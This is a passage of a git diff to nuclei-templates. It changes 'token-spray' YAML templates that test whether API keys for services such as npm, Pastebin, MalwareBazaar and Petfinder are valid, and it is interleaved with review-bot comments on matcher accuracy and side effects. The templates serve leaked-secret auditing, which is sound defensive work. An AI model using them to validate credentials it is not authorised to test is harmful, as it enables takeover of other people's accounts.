@@ -1,40 +0,0 @@ -id: api-malwarebazaar - -info: - name: MalwareBazaar API Test - author: daffainfo - severity: info - reference: - - https://bazaar.abuse.ch/api/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/MalwareBazaar.md - tags: token-spray,malwarebazaar - -self-contained: true -requests: - - raw: - - | - POST https://mb-api.abuse.ch/api/v1 HTTP/1.1 - Host: mb-api.abuse.ch - API-KEY: {{token}} - Content-Length: 0 - Content-Type: multipart/form-data; boundary=545d0ca717a743c3bd4fa575585f74c6 - - --545d0ca717a743c3bd4fa575585f74c6 - Content-Disposition: form-data; name="json_data" - Content-Type: application/json - - {"tags": ["exe", "test"], "references": {"twitter": ["https://twitter.com/abuse_ch/status/1224269018506330112"], "malpedia": ["https://malpedia.caad.fkie.fraunhofer.de/details/win.gozi"], "joe_sandbox": ["https://www.joesecurity.org/reports/1", "https://www.joesecurity.org/reports/2"], "links": ["https://urlhaus.abuse.ch/url/306613/"], "any_run": ["https://app.any.run/tasks/1", "https://app.any.run/tasks/2"]}, "context": {"comment": "this malware sample is very nasty!", "dropped_by_md5": ["68b329da9893e34099c7d8ad5cb9c940"], "dropped_by_malware": ["Gozi"], "dropped_by_sha256": ["01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b", "4355a46b19d348dc2f57c046f8ef63d4538ebb936000f3c9ee954a27460dd865"]}, "anonymous": 1, "delivery_method": "email_attachment"} - --545d0ca717a743c3bd4fa575585f74c6 - Content-Disposition: form-data; name="file"; filename="1.txt" - - dssd - - --545d0ca717a743c3bd4fa575585f74c6-- - - matchers: - - type: word - part: body - words: - - '"query_status": "inserted"' - - '"query_status": "file_already_known"' - condition: or diff --git a/nuclei-templates/Other/mapbox.yaml b/nuclei-templates/Other/api-mapbox-465.yaml similarity index 100% rename from nuclei-templates/Other/mapbox.yaml rename to nuclei-templates/Other/api-mapbox-465.yaml 
diff --git a/nuclei-templates/Other/api-mojoauth-466.yaml b/nuclei-templates/Other/api-mojoauth-466.yaml new file mode 100644 index 0000000000..f6cafe6873 --- /dev/null +++ b/nuclei-templates/Other/api-mojoauth-466.yaml @@ -0,0 +1,26 @@ +id: api-mojoauth + +info: + name: MojoAuth API Test + author: daffainfo + severity: info + reference: + - https://mojoauth.com/docs/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Authentication/MojoAuth.md + tags: token-spray,mojoauth + +self-contained: true +requests: + - raw: + - | + POST https://api.mojoauth.com/token/jwks HTTP/1.1 + Host: api.mojoauth.com + X-API-Key: {{token}} + matchers: + - type: word + part: body + words: + - '"keys"' + - '"kty"' + - '"kid"' + condition: and diff --git a/nuclei-templates/Other/api-mojoauth.yaml b/nuclei-templates/Other/api-mojoauth.yaml deleted file mode 100644 index db56c9a9bc..0000000000 --- a/nuclei-templates/Other/api-mojoauth.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: api-mojoauth - -info: - name: MojoAuth API Test - author: daffainfo - severity: info - description: Secure and modern passwordless authentication platform - reference: - - https://mojoauth.com/docs/ - - https://github.com/daffainfo/all-about-apikey/tree/main/mojoauth - tags: token-spray,mojoauth - -self-contained: true -requests: - - raw: - - | - POST https://api.mojoauth.com/token/jwks HTTP/1.1 - Host: api.mojoauth.com - X-API-Key: {{token}} - - matchers: - - type: word - part: body - words: - - '"keys"' - - '"kty"' - - '"kid"' - condition: and diff --git a/nuclei-templates/Other/api-monday.yaml b/nuclei-templates/Other/api-monday.yaml index 8f4a8df402..051d37980a 100644 --- a/nuclei-templates/Other/api-monday.yaml +++ b/nuclei-templates/Other/api-monday.yaml 
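Review bot: `/token/jwks` is by its purpose a JSON Web Key Set endpoint, and the matcher only checks for `"keys"`, `"kty"` and `"kid"` — fields every JWKS document carries — so if MojoAuth serves the set without a valid `X-API-Key`, this template reports every sprayed token as valid. Confirm against the linked docs whether the endpoint rejects a bad key; if it does not, move the check to an endpoint that actually authenticates. The blank line between the raw request block and `matchers:` was also dropped relative to the deleted file; harmless as YAML, but keep it for readability.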
@@ -8,10 +8,13 @@ info: reference: - https://api.developer.monday.com/docs - https://github.com/daffainfo/all-about-apikey/tree/main/monday + metadata: + max-request: 1 tags: token-spray,monday self-contained: true -requests: + +http: - raw: - | POST https://api.monday.com/v2 HTTP/1.1 @@ -29,3 +32,5 @@ requests: - '"name"' - '"account_id"' condition: and + +# digest: 4b0a00483046022100fecab9ebd8eaad24f05d6b7475b2383f3f088324f3a32899cfe6ae32e4dfb536022100d440bebd6717e33c5ee3d388f67e27db8bebb40f9883513e9d95029c7d710e0d:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-moonpay.yaml b/nuclei-templates/Other/api-moonpay.yaml index a7ec6a7d0d..c056f8768a 100644 --- a/nuclei-templates/Other/api-moonpay.yaml +++ b/nuclei-templates/Other/api-moonpay.yaml @@ -6,10 +6,13 @@ info: severity: info reference: - https://dashboard.moonpay.com/getting_started + metadata: + max-request: 1 tags: token-spray,moonpay,cryptocurrencies self-contained: true -requests: + +http: - method: GET path: - "https://api.moonpay.com/v3/currencies/btc/buy_quote?apiKey={{token}}&baseCurrencyAmount=1" @@ -20,3 +23,5 @@ requests: words: - '"accountId":' condition: and + +# digest: 4a0a0047304502210083a75b4859654813b629aa8a80ed9e99485c055b1604df425a543964b29c4bc00220054f9b7d5e4d105454b682739477035d7dadf0aa6e499f56626c1f17c7011c3f:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-mywot-467.yaml b/nuclei-templates/Other/api-mywot-467.yaml deleted file mode 100644 index 2440afe842..0000000000 --- a/nuclei-templates/Other/api-mywot-467.yaml +++ /dev/null 
@@ -1,27 +0,0 @@ -id: api-mywot - -info: - name: My Web of Trust API - author: daffainfo - severity: info - reference: - - https://support.mywot.com/hc/en-us/sections/360004477734-API- - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/Web%20of%20Trust.md - tags: token-spray,weboftrust - -self-contained: true -requests: - - raw: - - | - GET https://scorecard.api.mywot.com/v3/targets?t=hbo.com&t=google.com HTTP/1.1 - Host: scorecard.api.mywot.com - x-user-id: {{id}} - x-api-key: {{token}} - - matchers: - - type: word - part: body - words: - - '"target":' - - '"safety":' - condition: and diff --git a/nuclei-templates/Other/api-mywot.yaml b/nuclei-templates/Other/api-mywot.yaml new file mode 100644 index 0000000000..7256c5d9e8 --- /dev/null +++ b/nuclei-templates/Other/api-mywot.yaml @@ -0,0 +1,27 @@ +id: api-mywot + +info: + name: My Web of Trust API + author: daffainfo + severity: info + reference: + - https://support.mywot.com/hc/en-us/sections/360004477734-API- + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/Web%20of%20Trust.md + tags: token-spray,weboftrust + +self-contained: true +requests: + - raw: + - | + GET https://scorecard.api.mywot.com/v3/targets?t=hbo.com&t=google.com HTTP/1.1 + Host: scorecard.api.mywot.com + x-user-id: {{id}} + x-api-key: {{token}} + + matchers: + - type: word + part: body + words: + - '"target":' + - '"safety":' + condition: and diff --git a/nuclei-templates/Other/api-networksdb.yaml b/nuclei-templates/Other/api-networksdb.yaml index 862e63f04c..f57ec2b90c 100644 --- a/nuclei-templates/Other/api-networksdb.yaml +++ b/nuclei-templates/Other/api-networksdb.yaml @@ -29,3 +29,5 @@ http: - '"req_limit":' - '"resets_at":' condition: and + +# digest: 4a0a0047304502200f979f0111e0d4ef90fdf45bd27494b0939f4d57f146edf68329780072821763022100aabb25ee79551fb00c76cb58929d26a8dd93a1ef3b6832a88e74890602aa6bb7:922c64590222798bb761d5b6d8e72950 
diff --git a/nuclei-templates/Other/api-newrelic.yaml b/nuclei-templates/Other/api-newrelic.yaml index 3f650a1a87..f982297388 100644 --- a/nuclei-templates/Other/api-newrelic.yaml +++ b/nuclei-templates/Other/api-newrelic.yaml @@ -2,21 +2,24 @@ id: api-newrelic info: name: New Relic Rest API - author: 0xlittleboy + author: 0xpugazh severity: info reference: - https://docs.newrelic.com/docs/apis/rest-api-v2/application-examples-v2/list-your-app-id-metric-timeslice-data-v2 metadata: verified: true + max-request: 1 tags: token-spray,newrelic self-contained: true -requests: + +http: - raw: - | GET https://api.newrelic.com/v2/applications.json HTTP/1.1 Host: api.newrelic.com Api-Key: {{token}} + matchers: - type: word part: body @@ -25,3 +28,5 @@ requests: - '"application.servers":' - '"application.application_hosts":' condition: and + +# digest: 490a004630440220284f3670a18491fd97725bacd86222377d2f015639a8bd015596407ae505d5a50220124c0c9e58dfc8c73bf218bf6a7277639e628a2f44b0defa6383e87831ebf10a:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-notolytix.yaml b/nuclei-templates/Other/api-notolytix.yaml index c5531fc816..bb16495dae 100644 --- a/nuclei-templates/Other/api-notolytix.yaml +++ b/nuclei-templates/Other/api-notolytix.yaml @@ -28,3 +28,5 @@ http: - 'deviceId":' - 'personaId":' condition: and + +# digest: 490a0046304402202a263a22125b371bcf0ca9c8bf5641d8a0edd05086c2ef1213d58a4f8c9acb6702203da88b2a52cb6133f9e2e91743049c19f9dbeaaf4bdded12e213d2bb850e77db:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-npm-471.yaml b/nuclei-templates/Other/api-npm-471.yaml new file mode 100644 index 0000000000..a1e3db47b4 --- /dev/null +++ b/nuclei-templates/Other/api-npm-471.yaml 
@@ -0,0 +1,19 @@ +id: api-npm +info: + name: NPM API Test + author: zzeitlin + reference: https://docs.npmjs.com/creating-and-viewing-access-tokens + severity: info + tags: token-spray,node,npm,package,manager +requests: + - method: GET + path: + - "https://registry.npmjs.org/-/whoami" + headers: + Authorization: Bearer {{token}} + matchers: + - type: status + status: + - 401 + - 403 + negative: true diff --git a/nuclei-templates/Other/api-npm.yaml b/nuclei-templates/Other/api-npm.yaml deleted file mode 100644 index 522c793520..0000000000 --- a/nuclei-templates/Other/api-npm.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: api-npm - -info: - name: NPM API Test - author: zzeitlin - severity: info - reference: https://docs.npmjs.com/creating-and-viewing-access-tokens - tags: token-spray,node,npm - -self-contained: true -requests: - - method: GET - path: - - "https://registry.npmjs.org/-/whoami" - headers: - Authorization: Bearer {{token}} - - matchers: - - type: status - status: - - 401 - - 403 - negative: true diff --git a/nuclei-templates/Other/api-nytimes.yaml b/nuclei-templates/Other/api-nytimes.yaml index 5743e5817b..1778476446 100644 --- a/nuclei-templates/Other/api-nytimes.yaml +++ b/nuclei-templates/Other/api-nytimes.yaml @@ -7,10 +7,13 @@ info: description: NYTimes API Test reference: - https://developer.nytimes.com/apis + metadata: + max-request: 1 tags: token-spray,nytimes self-contained: true -requests: + +http: - raw: - | GET https://api.nytimes.com/svc/mostpopular/v2/shared/1.json?api-key={{token}} HTTP/1.1 @@ -24,3 +27,5 @@ requests: - '"copyright":' - '"num_results":' condition: and + +# digest: 4a0a0047304502201bd511ce9cbbdca3808df5a709dd89e39be2675caabaf0cb130068f2d7e03b4a022100d120a5cff52c46205182341cf35d529a3a264c93f3325d7dc20ab75787808039:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-open-page-rank.yaml b/nuclei-templates/Other/api-open-page-rank.yaml index 86312c9bbc..a2e3eecd9c 100644 
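Review bot: The new api-npm-471.yaml drops the `self-contained: true` line that the deleted api-npm.yaml (also on this line) carried, even though its `path` is an absolute registry URL rather than a `{{BaseURL}}` path; the new api-square.yaml later in this patch has the same regression. Without that flag nuclei, as far as I recall, treats the template as host-scoped and expects a target list, so the check may be skipped or run in the wrong context — restore `self-contained: true` above `requests:`. Separately, the negative status matcher on 401/403 accepts any other response, including 429 rate-limit and 5xx answers, as proof of a valid token; a positive word match on a field of the whoami response body would cut those false positives.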
--- a/nuclei-templates/Other/api-open-page-rank.yaml +++ b/nuclei-templates/Other/api-open-page-rank.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.domcop.com/openpagerank/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/open-page-rank + metadata: + max-request: 1 tags: token-spray,openpagerank self-contained: true -requests: + +http: - raw: - | GET https://openpagerank.com/api/v1.0/getPageRank?domains[]=google.com HTTP/1.1 @@ -26,3 +29,5 @@ requests: - '"page_rank_decimal"' - '"rank"' condition: and + +# digest: 4a0a00473045022100a24cf8506b2bcd21a59c324234f93d103ed7ba7623b5c9cffa79eaa8842e0baf02203b7574186a94356c304ce062fbf5be6822c0d48d2dc17137b9a2fd6d8a76855a:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-opengraphr.yaml b/nuclei-templates/Other/api-opengraphr.yaml index e2a071e100..3ad4395acb 100644 --- a/nuclei-templates/Other/api-opengraphr.yaml +++ b/nuclei-templates/Other/api-opengraphr.yaml @@ -8,10 +8,13 @@ info: reference: - https://opengraphr.com/docs/1.0/overview - https://github.com/daffainfo/all-about-apikey/tree/main/opengraphr + metadata: + max-request: 1 tags: token-spray,opengraphr self-contained: true -requests: + +http: - method: GET path: - "https://api.opengraphr.com/v1/og?api_token={{token}}&url=https://google.com" @@ -24,3 +27,5 @@ requests: - '"image"' - '"url"' condition: and + +# digest: 4a0a004730450221009a52105506cd5d4aa2903f3e86fb9013b695340758753a1e1d65a85dac5a7ffc02205e5b248c5b1c98ee496e8e2e6da109d745fa76f398d42672062cdfb8820b12eb:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-openweather-473.yaml b/nuclei-templates/Other/api-openweather-473.yaml index 1a9a5058e3..158ddb3ccf 100644 --- a/nuclei-templates/Other/api-openweather-473.yaml +++ b/nuclei-templates/Other/api-openweather-473.yaml 
@@ -1,17 +1,14 @@ id: api-openweather - info: name: OpenWeather API Test author: zzeitlin reference: https://openweathermap.org/current severity: info tags: token-spray,weather,openweather - requests: - method: GET path: - "https://api.openweathermap.org/data/2.5/weather?q=Chicago&appid={{token}}" - matchers: - type: status status: diff --git a/nuclei-templates/Other/api-opsgenie.yaml b/nuclei-templates/Other/api-opsgenie.yaml index 633d5d17a1..cdd4b9fa8e 100644 --- a/nuclei-templates/Other/api-opsgenie.yaml +++ b/nuclei-templates/Other/api-opsgenie.yaml @@ -2,21 +2,24 @@ id: api-opsgenie info: name: OpsGenie API Test - author: 0xlittleboy + author: 0xpugazh severity: info description: Forex currency market data reference: - https://docs.opsgenie.com/docs/api-overview + metadata: + max-request: 1 tags: token-spray,opsgenie self-contained: true -requests: + +http: - method: GET path: - "https://api.opsgenie.com/v2/alerts" + headers: Authorization: GenieKey {{token}} - matchers: - type: word part: body @@ -25,3 +28,5 @@ requests: - '"paging":' - '"took":' condition: and + +# digest: 4a0a00473045022100c50a581654d857a35a2fb9ebc7b2fab2867fc09f99679fd67fc1fe517655aa33022034c075dcfab67ff1836e5e772207cd79a24dd04ba66a5d240c9063fc3e2d4483:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-pagecdn.yaml b/nuclei-templates/Other/api-pagecdn.yaml index 61a332f1ea..2517a54744 100644 --- a/nuclei-templates/Other/api-pagecdn.yaml +++ b/nuclei-templates/Other/api-pagecdn.yaml @@ -8,10 +8,13 @@ info: reference: - https://pagecdn.com/docs/public-api - https://github.com/daffainfo/all-about-apikey/tree/main/pagecdn + metadata: + max-request: 1 tags: token-spray,pagecdn self-contained: true -requests: + +http: - method: GET path: - "https://pagecdn.com/api/v2/private/account/info?apikey={{token}}" 
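Review bot: In api-opsgenie.yaml the `description: Forex currency market data` line retained in the new template does not describe Opsgenie, which is an alerting and on-call management service; it reads as copy-pasted from another template. Since this commit already rewrites the surrounding info block (author, `metadata`, `http:`), it is the natural place to correct it, e.g. `description: Opsgenie alerting and on-call management API`.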
@@ -23,3 +26,5 @@ requests: - '"username"' - '"email"' condition: and + +# digest: 490a00463044022034ccfc3761571875058b3cb12eeb8206af0af10d6407416b430d5cf40d1d3ced022024c880405b2dcaea2abd4c77c58c90c40b2f0c55cdc6daa13da28bf146289779:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-pastebin-477.yaml b/nuclei-templates/Other/api-pastebin-477.yaml deleted file mode 100644 index 143f639fb1..0000000000 --- a/nuclei-templates/Other/api-pastebin-477.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: api-pastebin - -info: - name: Pastebin API Test - author: daffainfo - severity: info - reference: - - https://pastebin.com/doc_api - - https://github.com/daffainfo/all-about-apikey/blob/main/Cloud%20Storage%20-%20File%20Sharing/Pastebin.md - tags: token-spray,pastebin - -self-contained: true -requests: - - raw: - - | - POST https://pastebin.com/api/api_post.php HTTP/1.1 - Host: pastebin.com - Content-Type: application/x-www-form-urlencoded - Content-Length: 81 - - api_dev_key={{token}}&api_paste_code=test&api_option=paste - - matchers: - - type: word - part: body - words: - - 'https://pastebin.com/' diff --git a/nuclei-templates/Other/api-pastebin.yaml b/nuclei-templates/Other/api-pastebin.yaml new file mode 100644 index 0000000000..ab46ebbc09 --- /dev/null +++ b/nuclei-templates/Other/api-pastebin.yaml @@ -0,0 +1,28 @@ +id: api-pastebin + +info: + name: Pastebin API Test + author: daffainfo + severity: info + description: Plain Text Storage + reference: + - https://pastebin.com/doc_api + - https://github.com/daffainfo/all-about-apikey/tree/main/pastebin + tags: token-spray,pastebin + +self-contained: true +requests: + - raw: + - | + POST https://pastebin.com/api/api_post.php HTTP/1.1 + Host: pastebin.com + Content-Type: application/x-www-form-urlencoded + Content-Length: 81 + + api_dev_key={{token}}&api_paste_code=test&api_option=paste + + matchers: + - type: word + part: body + words: + - 'https://pastebin.com/' 
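Review bot: The new api-pastebin.yaml validates a key by actually creating a paste (`api_option=paste` with body `test`), so every run against a live key leaves a public artefact on that account instead of performing a read-only check; the new api-stytch.yaml later in this patch has the same property with `POST /v1/users`, which creates a user record in the tenant and may behave differently on repeat runs. A read-only endpoint, or at minimum a `description:` stating that the template mutates account state, would let operators decide before running it. The hardcoded `Content-Length: 81` also cannot match a body whose length depends on `{{token}}`; nuclei recomputes it for non-`unsafe` raw requests as far as I know, so it is misleading rather than broken, and the same value is hardcoded in the new api-petfinder.yaml.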
diff --git a/nuclei-templates/Other/api-paypal.yaml b/nuclei-templates/Other/api-paypal-478.yaml similarity index 100% rename from nuclei-templates/Other/api-paypal.yaml rename to nuclei-templates/Other/api-paypal-478.yaml diff --git a/nuclei-templates/Other/api-pdflayer.yaml b/nuclei-templates/Other/api-pdflayer.yaml index 141841d77c..55f49e8c69 100644 --- a/nuclei-templates/Other/api-pdflayer.yaml +++ b/nuclei-templates/Other/api-pdflayer.yaml @@ -8,10 +8,13 @@ info: reference: - https://pdflayer.com/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/pdflayer + metadata: + max-request: 1 tags: token-spray,pdflayer self-contained: true -requests: + +http: - raw: - | GET https://api.pdflayer.com/api/convert?access_key={{token}}&document_url=https://test.test HTTP/1.1 @@ -24,3 +27,5 @@ requests: - '"document_url_not_found"' - '"The document URL you specified was not found.' condition: and + +# digest: 490a00463044022041b3237526765cd6d77fe6ef1155a25ac46dafb4dc0ab47fb6c9ef12072776150220518950d7ce32576b7411e66b71101696a595efae08e6f287beeeb877a3ee892c:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-pendo.yaml b/nuclei-templates/Other/api-pendo.yaml index 8ea141bcc0..023a6f347c 100644 --- a/nuclei-templates/Other/api-pendo.yaml +++ b/nuclei-templates/Other/api-pendo.yaml 
@@ -3,21 +3,23 @@ id: api-pendo info: name: Pendo API Test author: zzeitlin - reference: https://help.pendo.io/resources/support-library/api/index.html severity: info + reference: https://help.pendo.io/resources/support-library/api/index.html tags: token-spray,pendo +self-contained: true requests: - method: GET path: - "https://app.pendo.io/api/v1/feature" - - "https://app.pendo.io/api/v1/metadata/schema/account" headers: Content-Type: application/json X-Pendo-Integration-Key: "{{token}}" matchers: - - type: status - status: - - 403 - negative: true \ No newline at end of file + - type: word + part: body + words: + - '"createdByUser":' + - '"id":' + condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/api-petfinder-480.yaml b/nuclei-templates/Other/api-petfinder-480.yaml deleted file mode 100644 index 17fd3a85c3..0000000000 --- a/nuclei-templates/Other/api-petfinder-480.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: api-petfinder - -info: - name: Petfinder API Test - author: daffainfo - severity: info - reference: - - https://www.petfinder.com/developers/v2/docs/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Animals/Petfinder.md - tags: token-spray,petfinder - -self-contained: true -requests: - - raw: - - | - POST https://api.petfinder.com/v2/oauth2/token HTTP/1.1 - Host: api.petfinder.com - Content-Type: application/x-www-form-urlencoded - Content-Length: 81 - - grant_type=client_credentials&client_id={{id}}&client_secret={{secret}} - - matchers: - - type: word - part: body - words: - - '"token_type"' - - '"expires_in"' - - '"access_token"' - condition: and diff --git a/nuclei-templates/Other/api-petfinder.yaml b/nuclei-templates/Other/api-petfinder.yaml new file mode 100644 index 0000000000..ae0b6866a1 --- /dev/null +++ b/nuclei-templates/Other/api-petfinder.yaml 
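Review bot: api-pendo.yaml keeps the `requests:` key and gains no `metadata: max-request: 1` or digest line, while most templates touched by this patch are migrated to `http:` with that metadata; api-stripe.yaml, api-spotify.yaml, api-square.yaml and the other newly added files are left on the old key as well. `requests:` is, as far as I know, the deprecated pre-v3 spelling, so the repository ends up half-migrated after this commit. The hunk also preserves the `\ No newline at end of file` state on both sides — worth adding a terminating newline while the matcher block is being rewritten anyway.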
@@ -0,0 +1,31 @@ +id: api-petfinder + +info: + name: Petfinder API Test + author: daffainfo + severity: info + description: Petfinder is dedicated to helping pets find homes, another resource to get pets adopted + reference: + - https://www.petfinder.com/developers/v2/docs/ + - https://github.com/daffainfo/all-about-apikey/tree/main/petfinder + tags: token-spray,petfinder + +self-contained: true +requests: + - raw: + - | + POST https://api.petfinder.com/v2/oauth2/token HTTP/1.1 + Host: api.petfinder.com + Content-Type: application/x-www-form-urlencoded + Content-Length: 81 + + grant_type=client_credentials&client_id={{id}}&client_secret={{secret}} + + matchers: + - type: word + part: body + words: + - '"token_type"' + - '"expires_in"' + - '"access_token"' + condition: and diff --git a/nuclei-templates/Other/pivotaltracker.yaml b/nuclei-templates/Other/api-pivotaltracker-482.yaml similarity index 100% rename from nuclei-templates/Other/pivotaltracker.yaml rename to nuclei-templates/Other/api-pivotaltracker-482.yaml diff --git a/nuclei-templates/Other/postmark.yaml b/nuclei-templates/Other/api-postmark-483.yaml similarity index 100% rename from nuclei-templates/Other/postmark.yaml rename to nuclei-templates/Other/api-postmark-483.yaml diff --git a/nuclei-templates/Other/api-prexview.yaml b/nuclei-templates/Other/api-prexview.yaml index 8d9b95589b..93bf2b30dc 100644 --- a/nuclei-templates/Other/api-prexview.yaml +++ b/nuclei-templates/Other/api-prexview.yaml @@ -8,10 +8,13 @@ info: reference: - https://prexview.com/docs/ - https://github.com/daffainfo/all-about-apikey/tree/main/prexview + metadata: + max-request: 1 tags: token-spray,prexview self-contained: true -requests: + +http: - raw: - | POST https://api.prexview.com/v1/transform HTTP/1.1 
@@ -25,3 +28,5 @@ requests: - '"output is a required argument"' - '"status":400' condition: and + +# digest: 4b0a00483046022100bc565ad6d829c472e911c51e70fad26057dbc794dabf992a127d9f992c8b767f022100a21795f9f28f7f967d5abad13d87a437777d96b5851ceea6cf9a2c875c1eb4e8:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-proxycrawl.yaml b/nuclei-templates/Other/api-proxycrawl.yaml index 37e1821aa5..23a82cb10f 100644 --- a/nuclei-templates/Other/api-proxycrawl.yaml +++ b/nuclei-templates/Other/api-proxycrawl.yaml @@ -8,10 +8,13 @@ info: reference: - https://proxycrawl.com/docs/ - https://github.com/daffainfo/all-about-apikey/tree/main/proxycrawl + metadata: + max-request: 1 tags: token-spray,proxycrawl self-contained: true -requests: + +http: - method: GET path: - "https://api.proxycrawl.com/leads?token={{token}}&domain=www.amazon.com" @@ -24,3 +27,5 @@ requests: - '"domain"' - '"leads"' condition: and + +# digest: 490a004630440220088997cfa194d9f7e61db56502b823b07527adc1a245f4febe1ca37e88d76456022051c7378b301dac88738df762caee87a477a0d1336fd3b7b0ddbe370b9e65c43c:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-proxykingdom.yaml b/nuclei-templates/Other/api-proxykingdom.yaml index 35ddc84301..fa9ec48daa 100644 --- a/nuclei-templates/Other/api-proxykingdom.yaml +++ b/nuclei-templates/Other/api-proxykingdom.yaml @@ -8,10 +8,13 @@ info: reference: - https://proxykingdom.com/documentation - https://github.com/daffainfo/all-about-apikey/tree/main/proxykingdom + metadata: + max-request: 1 tags: token-spray,proxykingdom self-contained: true -requests: + +http: - method: GET path: - "https://api.proxykingdom.com/proxy?token={{token}}" @@ -24,3 +27,5 @@ requests: - '"port"' - '"protocol"' condition: and + +# digest: 4b0a00483046022100caa9d7312c7246651127f8ea95b26e9a637e3219288ac8761696c928959f27ed022100b088f447706a1c6643530d00de0ca2d254703dacef21a7e945d7853a4ea3fb7e:922c64590222798bb761d5b6d8e72950 
diff --git a/nuclei-templates/Other/api-rijksmuseum-486.yaml b/nuclei-templates/Other/api-rijksmuseum-486.yaml new file mode 100644 index 0000000000..6e6c1c40cd --- /dev/null +++ b/nuclei-templates/Other/api-rijksmuseum-486.yaml @@ -0,0 +1,25 @@ +id: api-rijksmuseum + +info: + name: Rijksmuseum API Test + author: daffainfo + severity: info + reference: + - https://data.rijksmuseum.nl/user-generated-content/api/ + - https://github.com/daffainfo/all-about-apikey/blob/main/Art-Design/Rijksmuseum.md + tags: token-spray,rijksmuseum + +self-contained: true +requests: + - method: GET + path: + - "https://www.rijksmuseum.nl/api/nl/usersets?key={{token}}&format=json&page=2" + + matchers: + - type: word + part: body + words: + - '"count":' + - '"userSets":' + - '"user":' + condition: and diff --git a/nuclei-templates/Other/api-rijksmuseum.yaml b/nuclei-templates/Other/api-rijksmuseum.yaml deleted file mode 100644 index 11327595a7..0000000000 --- a/nuclei-templates/Other/api-rijksmuseum.yaml +++ /dev/null @@ -1,25 +0,0 @@ -id: api-rijksmuseum - -info: - name: Rijksmuseum API Test - author: daffainfo - severity: info - reference: - - https://data.rijksmuseum.nl/user-generated-content/api/ - - https://github.com/daffainfo/all-about-apikey/blob/main/Art%20Design/Rijksmuseum.md - tags: token-spray,rijksmuseum - -self-contained: true -requests: - - method: GET - path: - - "https://www.rijksmuseum.nl/api/nl/usersets?key={{token}}&format=json&page=2" - - matchers: - - type: word - part: body - words: - - '"count":' - - '"userSets":' - - '"user":' - condition: and diff --git a/nuclei-templates/Other/api-savepage.yaml b/nuclei-templates/Other/api-savepage.yaml index a75fabd12a..eaef59b2c4 100644 --- a/nuclei-templates/Other/api-savepage.yaml +++ b/nuclei-templates/Other/api-savepage.yaml 
@@ -8,10 +8,13 @@ info: reference: - https://docs.savepage.io - https://github.com/daffainfo/all-about-apikey/tree/main/savepage + metadata: + max-request: 1 tags: token-spray,savepage self-contained: true -requests: + +http: - method: GET path: - "https://api.savepage.io/v1?key={{token}}&q=https://selfcontained.test" @@ -21,3 +24,5 @@ requests: part: body words: - 'getaddrinfo ENOTFOUND selfcontained.test' + +# digest: 490a0046304402204e42d74af915b48e26f8e5b3ef52406ad7e7564ccabd1919fd950bfbcbb9ecc902202162047f29d81a1cce27ed88245a3c9d6331be3cb73e18858c8b727f778c0d54:922c64590222798bb761d5b6d8e72950 diff --git a/nuclei-templates/Other/api-scanii-487.yaml b/nuclei-templates/Other/api-scanii-487.yaml deleted file mode 100644 index 9c9b50f9e0..0000000000 --- a/nuclei-templates/Other/api-scanii-487.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: api-scanii - -info: - name: Scanii API Test - author: daffainfo - severity: info - reference: - - https://docs.scanii.com/v2.1/resources.html - - https://github.com/daffainfo/all-about-apikey/blob/main/Anti%20Malware/Scanii.md - tags: token-spray,scanii - -self-contained: true -requests: - - raw: - - | - GET https://api.scanii.com/v2.1/ping HTTP/1.1 - Authorization: Basic {{base64(api + ':' + secret)}} - Host: api.scanii.com - - matchers: - - type: word - part: body - words: - - '"key"' - - '"message" : "pong"' - condition: and diff --git a/nuclei-templates/Other/api-scanii-488.yaml b/nuclei-templates/Other/api-scanii-488.yaml new file mode 100644 index 0000000000..a50bcb42a1 --- /dev/null +++ b/nuclei-templates/Other/api-scanii-488.yaml 
@@ -0,0 +1,26 @@ +id: api-scanii + +info: + name: Scanii API Test + author: daffainfo + severity: info + reference: + - https://docs.scanii.com/v2.1/resources.html + - https://github.com/daffainfo/all-about-apikey/blob/main/Anti-Malware/Scanii.md + tags: token-spray,scanii + +self-contained: true +requests: + - raw: + - | + GET https://api.scanii.com/v2.1/ping HTTP/1.1 + Authorization: Basic {{base64(api + ':' + secret)}} + Host: api.scanii.com + + matchers: + - type: word + part: body + words: + - '"key"' + - '"message" : "pong"' + condition: and diff --git a/nuclei-templates/Other/api-scraperapi.yaml b/nuclei-templates/Other/api-scraperapi.yaml index cd56996783..74004f9f24 100644 --- a/nuclei-templates/Other/api-scraperapi.yaml +++ b/nuclei-templates/Other/api-scraperapi.yaml @@ -8,10 +8,13 @@ info: reference: - https://www.scraperapi.com/documentation/ - https://github.com/daffainfo/all-about-apikey/tree/main/scraperapi + metadata: + max-request: 1 tags: token-spray,scraperapi self-contained: true -requests: + +http: - method: GET path: - "http://api.scraperapi.com/account?api_key={{token}}" @@ -24,3 +27,5 @@ requests: - '"concurrentRequests"' - '"requestLimit"' condition: and + +# digest: 490a0046304402206581528b6146f4b236024133b4794a75c58849ba7d34f14de80b23481f1c700e022019fff75a44f572ebab929eaaacfb8236d76b0c923438623fc0bb74cb1ad8d144:922c64590222798bb761d5b6d8e72950 diff --git 